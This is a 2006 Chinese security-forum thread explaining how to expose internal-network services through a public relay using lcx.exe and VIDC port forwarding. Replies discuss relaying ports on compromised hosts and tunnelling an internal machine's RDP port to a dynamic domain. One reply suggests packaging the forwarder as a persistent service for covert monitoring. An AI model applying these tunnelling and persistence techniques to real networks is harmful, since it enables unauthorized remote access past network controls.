文章作者：zxzgcn(萍水相逢)
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

一年前写的了，今天丢上来.
今天给大家说说如何巧用端口映射，不通过网关开放内网的方法。
一：使用前提
需要有一台公网的IP。假如现在我们有一台公网的IP ：210.210.21.21
二：用到的工具
1．lcx.exe
2.  vdic
三：方法讲解
      方法一：用lcx.exe进行映射。
    (1)我们将lcx.exe传到公网IP上，在公网IP上DOS环境下执行 lcx –listen 端口1 端口2
    如lcx –listen 3030 3166 见下图

image001.jpg (104 KB)

2006-5-24 18:22

此命令的意思是监听3030端口和3166端口，以便和外部进行连接。
（2）将lcx.exe下载到要开放的内网的计算机上，然后在DOS环境下执行 lcx –slave 公网IP  端口 内网IP  端口  
  如lcx -slave 211.211.21.21 3030 172.16.32.153 80 见下图：

image003.jpg (37 KB)

2006-5-24 18:22

解释一下，这句话的意思是说将内网计算机IP为 172.16.32.153 的80端口（也就是WEB 服务端口）
映射到公网IP为210.210.21.21的3030端口上,这样，内网和公网的计算机就建立 起了连接。 如果你
内网计算机提供WEB服务，现在，只要通过外网IP 210.210.21.21和端口3166 可以访问内网的网站了。
如图开放IP前，访问地址 http://172.16.32.153/index.htm

image005.jpg (51 KB)

2006-5-24 18:22

开放IP后，访问地址 http://210.210.21.21:3166/index.htm  见下图

image007.jpg (51 KB)

2006-5-24 18:22

   方法二：用VIDC
我们将vidcs.exe传到公网IP上，在公网计算机上运行vidcs –p端口，如vdics –p5205见下图

image009.jpg (25 KB)

2006-5-24 18:22

这句话的意思是在公网计算机上监听端口 5205 然后回到内网计算机上，直接点击运行
vIDCc.exe，见下图

image011.jpg (28 KB)

2006-5-24 18:22

解释一下上面的设置: VIDC服务IP，指运行了vidcs.exe进行监听了端口的IP地址，端口指是在公网上监听的端口，上面我监听的是5205端口，bindip指你要开放出去的内网的IP， Bind端口指你内网计算机需要开放的端口(FTP服务器端口为21，  WEB 服务端口为80， mail服务端口25)你想开放哪个就填哪个吧。
映射端口指你想通过公网哪个端口提供服务。端口由你定,填好之后,我们点”连接”,马上就到收到提示Success to Connect(210.210.21.21:5205,ver:1.2), 说明连接成功。继续点”bind”，同样会收到成功的提示。
这样，你的机子的80端口就开放出去了。 访问方法 http://公网ip:映射端口。
如 http://210.210.21.21:8080 见下图

image012.jpg (51 KB)

2006-5-24 18:22

上面就是两种不通过网关开放内网的方法.
　

真不通过网关？
学校使用VLAN，使用PPPOE拨号上网，一个上内网不用钱，另外使用201拨号上外网。将我肉鸡作成一个代理服务器，我如果用端口重定向到上面去莫非可以直接相连，上了内网莫非可以直接连上外网？不可能吧，内网网关不会放我出去的。

引用:

这里是引用第[1 楼]的ivanovo于2006-05-26 20:59发表的：
真不通过网关？
学校使用VLAN，使用PPPOE拨号上网，一个上内网不用钱，另外使用201拨号上外网。将我肉鸡作成一个代理服务器，我如果用端口重定向到上面去莫非可以直接相连，上了内网莫非可以直接连上外网？不可能吧，内网网关不会放我出去的。

这个的条件至少是内网机器能连到那台肉鸡上吧。
如果不能访问的话第一步连接外网主机就不能成功连接了。

楼主的三位兄弟，可能你们误解了，我说的不通过网关开放内网意思是说不用在你计算机所在网络的网关上作映射把你的机子开放出去可以供外网访问，就是这个目的

LCX用来转发肉鸡上的端口也就算了，用来做这个东西，楼主你不觉得多此一举吗？而且执行性并不高，不过思路是好的。（第一贴，顶自己一个）

只是个方法罢了，介绍给还不会这种方法的朋友的，适合攻击时用，至于真正的用来开放做WEB服务，那就不行了，太差了

楼上的几位不觉得无聊么？一个不严谨的标题引起你们这么激烈的讨论，真的很有意义么？
我都删了。

兄弟，我帮你顶一下。
至于楼上的讨论，个人觉得是没有认真理解楼主的意思，首先都连不上代理的机器，还能突破什么？？
有些东西需要人去总结的：）

如果在局域网中有两个网段 ,A网段直接联到外网,B段上的有个软路由连到A上进行上网
这种情况能不能用啊

引用:

这里是引用第[9 楼]的starky于2006-06-14 19:35发表的：
如果在局域网中有两个网段 ,A网段直接联到外网,B段上的有个软路由连到A上进行上网
这种情况能不能用啊

有公网才行

经常用第二种方法。很是好用。。。用外网跳一下。。和鸽子的映射差不多的操作！

回复 LCX用来转发肉鸡上的端口也就算了，用来做这个东西，楼主你不觉得多此一举吗？而且执行性并不高，不过思路是好的。（第一贴，顶自己一个）

楼主的思路是不过网关
这是很好的
肉鸡的lcx貌似是需要经过网关的
要是网关被废
就完了
还是支持 很好的思路

不过上面的方法不太稳定。。。。 真接用vpn好得多

引用:

引用第12楼huddhuddhudd于2007-09-15 22:17发表的 :
不过上面的方法不太稳定。。。。 真接用vpn好得多

不知道能不能介绍一下方便一点的建立vpn的方法？

两种方法都很好。
不过有个问题想问下
比如有这样一样东西
xxx.3322.org是我的动态域名
我利用lcx或者ht到内网转发
执行命令ht -p -slave XXX.3322.ORG 2657 127.0.0.1 3389
自己的机子ht -p -listen 2657 5632
那么我连127.0.0.1:5632是可以进入内网的3389的，这个自是不必说
我的想法是把ht集装成一个程序，利用服务或者驱动的方法来转发内网端口
这样的话，貌似又有点画蛇添足（反弹类的远控不就是这个原理吗，直接上个鸽子就可以了）。
不过我想，有些时候对于菜鸟来说，没有什么好的backdoor,而想对内网的机子进行监控
有个类似的东西可能好点
也许还有人说做个bat就可以啊，但是如果对方重其了电脑呢？直接让对方bat，是不是很嚣张啊


只是个思路，所以想了再想才发出来
千万别见笑。
[s:57]

这个题目太误导人了
不经过网关怎么可能，数据包都没地方发

楼主的方法还需要一台公网的肉鸡
不太方便
我想
不通过网关访问内网
应该是不可能的吧

说来说去，还是要有一台公网主机
并且你给的几个工具，隐蔽性不好
容易被发现
不过方法还是可以学习滴。